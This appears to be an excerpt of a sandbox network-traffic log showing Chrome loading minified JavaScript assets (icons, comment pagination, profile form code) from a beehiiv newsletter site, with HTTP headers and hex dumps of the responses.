                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC915INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 82295
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"14177-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c34c1b8c51-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC454INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 38 39 65 39 63 32 30 35 2d 37 64 66 62 2d 35 64 33 63 2d 38 34 35 33 2d 34 62 34 66 37 39 62 32 33 37 65 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="89e9c205-7dfb-5d3c-8453-4b4f79b237e1")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 7b 75 20 61 73 20 4d 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 70 2c 61 20 61 73 20 67 65 2c 75 20 61 73 20 77 65 2c 62 20 61 73 20 58 2c 67 20 61 73 20 50 65 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 71 65 2c 43 20 61 73 20 4a 65 2c 44 20 61 73 20 59 65 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 54 74 75 49 6a 7a 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 42 20 61 73 20 56 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 45 7a 76 71 4c 59 39 32 2e 6a 73 22 3b 69 6d 70
                                                                                                                                            Data Ascii: t{u as M}from"./useTranslation-CfKJAmGY.js";import{r as p,a as ge,u as we,b as X,g as Pe}from"./index-D6da9p6-.js";import{u as qe,C as Je,D as Ye}from"./index-DTtuIjz-.js";import{c as E}from"./index-x2da_zcv.js";import{B as V}from"./index-EzvqLY92.js";imp
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 61 73 20 77 74 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 79 70 65 64 4c 6f 61 64 65 72 44 61 74 61 2d 42 6b 31 5f 74 75 36 38 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 78 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 46 44 6f 69 76 6a 42 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 76 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 62 6e 54 7a 65 4c 66 2e 6a 73 22 3b 69 6d 70 6f 72 74 22 2e 2f 69 6e 64 65 78 2d 43 71 4a 4e 38 69 51 71 2e 6a 73 22 3b 69 6d 70 6f 72 74 22 2e 2f 4c 6f 67 69 6e 57 69 74 68 50 61 73 73 77 6f 72 64 41 63 74 69 6f 6e 2d 54 56 4c 70 4a 61 4c 71 2e 6a 73 22 3b 69 6d 70 6f 72 74 22 2e 2f 52 65 64 69 72 65 63 74 54 6f 48 69 64 64 65 6e 49 6e 70 75 74 2d 6d 55 62 34 79 69 69 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 22 2e 2f 63
                                                                                                                                            Data Ascii: as wt}from"./useTypedLoaderData-Bk1_tu68.js";import{g as xt}from"./index-BFDoivjB.js";import{g as vt}from"./index-BbnTzeLf.js";import"./index-CqJN8iQq.js";import"./LoginWithPasswordAction-TVLpJaLq.js";import"./RedirectToHiddenInput-mUb4yii7.js";import"./c
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 20 32 2e 32 35 20 35 2e 31 34 20 32 2e 32 35 20 36 2e 37 34 31 76 36 2e 30 31 38 5a 22 7d 29 29 7d 63 6f 6e 73 74 20 6a 74 3d 70 2e 66 6f 72 77 61 72 64 52 65 66 28 79 74 29 3b 66 75 6e 63 74 69 6f 6e 20 62 74 28 7b 74 69 74 6c 65 3a 65 2c 74 69 74 6c 65 49 64 3a 6e 2c 2e 2e 2e 73 7d 2c 72 29 7b 72 65 74 75 72 6e 20 70 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68
                                                                                                                                            Data Ascii: 2.25 5.14 2.25 6.741v6.018Z"}))}const jt=p.forwardRef(yt);function bt({title:e,titleId:n,...s},r){return p.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-h
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 31 32 20 39 76 33 2e 37 35 6d 2d 39 2e 33 30 33 20 33 2e 33 37 36 63 2d 2e 38 36 36 20 31 2e 35 2e 32 31 37 20 33 2e 33 37 34 20 31 2e 39 34 38 20 33 2e 33 37 34 68 31 34 2e 37 31 63 31 2e 37 33 20 30 20 32 2e 38 31 33 2d 31 2e 38 37 34 20 31 2e 39 34 38 2d 33 2e 33 37 34 4c 31 33 2e 39 34 39 20 33 2e 33 37 38 63 2d 2e 38 36 36 2d 31 2e 35 2d 33 2e 30 33 32 2d 31 2e 35 2d 33 2e 38 39 38 20 30 4c 32 2e 36 39 37 20 31 36 2e 31 32 36 5a 4d 31 32 20 31 35 2e 37 35 68 2e 30 30 37 76 2e 30 30 38 48 31 32 76 2d 2e 30 30 38 5a 22 7d 29 29 7d 63 6f 6e 73 74 20 6b 65 3d 70 2e 66 6f 72 77 61 72 64 52 65 66 28 4e 74 29 3b 66 75 6e 63 74 69 6f 6e 20 53
                                                                                                                                            Data Ascii: cap:"round",strokeLinejoin:"round",d:"M12 9v3.75m-9.303 3.376c-.866 1.5.217 3.374 1.948 3.374h14.71c1.73 0 2.813-1.874 1.948-3.374L13.949 3.378c-.866-1.5-3.032-1.5-3.898 0L2.697 16.126ZM12 15.75h.007v.008H12v-.008Z"}))}const ke=p.forwardRef(Nt);function S
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6f 64 64 22 2c 64 3a 22 4d 35 2e 32 32 20 38 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 31 2e 30 36 20 30 4c 31 30 20 31 31 2e 39 34 6c 33 2e 37 32 2d 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 31 20 31 20 31 2e 30 36 20 31 2e 30 36 6c 2d 34 2e 32 35 20 34 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 31 2e 30 36 20 30 4c 35 2e 32 32 20 39 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 30 2d 31 2e 30 36 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 7d 29 29 7d 63 6f 6e 73 74 20 45 74 3d 70 2e 66 6f 72 77 61 72 64 52 65 66 28 4c 74 29 2c 78 65 3d 28 29 3d 3e 7b 63 6f 6e 73 74 7b 74 3a 65 7d 3d 4d 28 29 2c 7b 68 61 6e 64 6c 65 4f 70 65 6e 4d 6f 64 61 6c 3a 6e 7d 3d 49 65 28 29 3b 72 65 74 75 72 6e 20 74 2e 6a 73 78 73 28 52
                                                                                                                                            Data Ascii: odd",d:"M5.22 8.22a.75.75 0 0 1 1.06 0L10 11.94l3.72-3.72a.75.75 0 1 1 1.06 1.06l-4.25 4.25a.75.75 0 0 1-1.06 0L5.22 9.28a.75.75 0 0 1 0-1.06Z",clipRule:"evenodd"}))}const Et=p.forwardRef(Lt),xe=()=>{const{t:e}=M(),{handleOpenModal:n}=Ie();return t.jsxs(R
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 2c 72 26 26 79 2e 61 70 70 65 6e 64 28 22 6f 72 64 65 72 22 2c 72 29 2c 6c 2e 6c 6f 61 64 28 60 2f 70 61 67 69 6e 61 74 65 64 5f 63 6f 6d 6d 65 6e 74 73 3f 24 7b 79 2e 74 6f 53 74 72 69 6e 67 28 29 7d 60 29 7d 7d 2c 5b 63 2c 67 5d 29 2c 70 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6c 2e 64 61 74 61 26 26 28 67 2e 70 61 67 65 3d 3d 3d 6c 2e 64 61 74 61 2e 70 61 67 69 6e 61 74 69 6f 6e 2e 70 61 67 65 26 26 21 67 2e 61 64 64 65 64 26 26 28 68 28 5b 2e 2e 2e 69 2c 2e 2e 2e 6c 2e 64 61 74 61 2e 63 6f 6d 6d 65 6e 74 73 5d 29 2c 76 28 7b 70 61 67 65 3a 67 2e 70 61 67 65 2c 61 64 64 65 64 3a 21 30 7d 29 29 2c 6d 7c 7c 66 28 21 30 29 29 7d 2c 5b 6c 2e 64 61 74 61 5d 29 2c 7b 69 6e 69 74 69 61 6c 46 65 74 63 68 65 64 3a 6d 2c 63 6f 6d 6d 65 6e 74 73 3a 69 2c
                                                                                                                                            Data Ascii: ,r&&y.append("order",r),l.load(`/paginated_comments?${y.toString()}`)}},[c,g]),p.useEffect(()=>{l.data&&(g.page===l.data.pagination.page&&!g.added&&(h([...i,...l.data.comments]),v({page:g.page,added:!0})),m||f(!0))},[l.data]),{initialFetched:m,comments:i,
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 73 74 5f 6e 61 6d 65 22 2c 61 75 74 6f 43 6f 6d 70 6c 65 74 65 3a 22 66 61 6d 69 6c 79 2d 6e 61 6d 65 22 2c 6c 61 62 65 6c 3a 60 24 7b 6d 28 22 6d 61 6e 61 67 65 2e 70 65 72 73 6f 6e 61 6c 5f 64 65 74 61 69 6c 73 5f 66 6f 72 6d 2e 6c 61 73 74 5f 6e 61 6d 65 22 29 7d 60 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 60 24 7b 6d 28 22 6d 61 6e 61 67 65 2e 70 65 72 73 6f 6e 61 6c 5f 64 65 74 61 69 6c 73 5f 66 6f 72 6d 2e 6c 61 73 74 5f 6e 61 6d 65 22 29 7d 60 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 6e 7d 29 2c 74 2e 6a 73 78 28 5a 2c 7b 6e 61 6d 65 3a 22 70 72 6f 66 69 6c 65 22 2c 65 72 72 6f 72 4d 65 73 73 61 67 65 3a 6d 28 22 65 72 72 6f 72 73 2e 64 65 66 61 75 6c 74 22 29 2c 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3a 6d 28 22 74 6f 61 73 74 2e 73 75 63 63 65
                                                                                                                                            Data Ascii: st_name",autoComplete:"family-name",label:`${m("manage.personal_details_form.last_name")}`,placeholder:`${m("manage.personal_details_form.last_name")}`,defaultValue:n}),t.jsx(Z,{name:"profile",errorMessage:m("errors.default"),successMessage:m("toast.succe
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 2e 36 33 34 34 56 32 2e 35 37 39 30 38 48 39 2e 35 31 38 35 34 4c 37 2e 34 30 33 36 32 20 34 2e 37 32 37 36 39 4c 35 2e 32 38 37 37 37 20 32 2e 35 37 39 30 38 48 33 2e 31 37 31 39 33 56 38 2e 34 32 33 31 36 4c 35 2e 32 38 37 37 37 20 38 2e 34 32 31 36 37 5a 4d 31 39 2e 34 36 32 35 20 35 2e 35 48 31 37 2e 33 34 36 36 56 32 2e 35 37 38 33 33 48 31 35 2e 32 33 31 37 56 35 2e 35 48 31 33 2e 31 31 35 38 4c 31 36 2e 32 38 38 37 20 38 2e 35 30 38 30 36 4c 31 39 2e 34 36 32 35 20 35 2e 35 5a 22 2c 66 69 6c 6c 3a 22 23 44 31 44 35 44 42 22 7d 29 7d 29 2c 50 74 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 5b 6e 2c 73 5d 3d 70 2e 75 73 65 53 74 61 74 65 28 21 31 29 3b 72 65 74 75 72 6e 20 74 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73
                                                                                                                                            Data Ascii: .6344V2.57908H9.51854L7.40362 4.72769L5.28777 2.57908H3.17193V8.42316L5.28777 8.42167ZM19.4625 5.5H17.3466V2.57833H15.2317V5.5H13.1158L16.2887 8.50806L19.4625 5.5Z",fill:"#D1D5DB"})}),Pt=({children:e})=>{const[n,s]=p.useState(!1);return t.jsxs("div",{clas
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 2d 75 2c 64 3d 77 3c 30 2c 78 3d 60 63 6f 6d 6d 65 6e 74 5f 24 7b 73 3f 2e 69 64 7d 5f 24 7b 6e 7d 60 2c 62 3d 70 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 70 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6a 3d 62 2e 63 75 72 72 65 6e 74 2c 5f 3d 79 3d 3e 7b 63 6f 6e 73 74 20 43 3d 79 2e 74 61 72 67 65 74 3b 43 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 61 75 74 6f 22 2c 43 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 60 24 7b 43 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 7d 70 78 60 7d 3b 72 65 74 75 72 6e 20 6a 26 26 28 6a 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 61 75 74 6f 22 2c 6a 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 60 24 7b 6a 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 7d 70 78 60 2c 6a 2e 73 74 79 6c 65
                                                                                                                                            Data Ascii: t-u,d=w<0,x=`comment_${s?.id}_${n}`,b=p.useRef(null);return p.useEffect(()=>{const j=b.current,_=y=>{const C=y.target;C.style.height="auto",C.style.height=`${C.scrollHeight}px`};return j&&(j.style.height="auto",j.style.height=`${j.scrollHeight}px`,j.style


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            141192.168.2.1649868104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC713OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC344INHTTP/1.1 302 Found
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Length: 0
                                                                                                                                            Connection: close
                                                                                                                                            location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?
                                                                                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                            access-control-allow-origin: *
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c34c4bc40c-EWR


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            142192.168.2.1649869104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC561OUTGET /assets/ChevronRightIcon-Dsmk2epM.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC900INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 849
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"351-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c369b94301-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC469INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 32 35 36 36 38 33 61 2d 33 32 64 65 2d 35 32 35 36 2d 62 30 32 61 2d 32 30 64 62 64 64 31 39 32 38 30 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c256683a-32de-5256-b02a-20dbdd192806")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC380INData Raw: 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 6d 38 2e 32 35 20 34 2e 35 20 37 2e 35 20 37 2e 35 2d 37 2e 35 20 37 2e 35 22 7d 29 29 7d 63 6f 6e 73 74 20 73 3d 65 2e 66 6f 72 77 61 72 64 52 65
                                                                                                                                            Data Ascii: ,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m8.25 4.5 7.5 7.5-7.5 7.5"}))}const s=e.forwardRe


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            143192.168.2.1649870104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC557OUTGET /assets/relativeTime-tlGPeD3Q.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1711
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"6af-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c36c567290-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 66 39 36 64 63 64 31 2d 39 37 33 38 2d 35 62 36 33 2d 38 38 63 31 2d 39 63 62 62 30 36 31 61 65 66 35 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ff96dcd1-9738-5b63-88c1-9cbb061aef52")}catch(
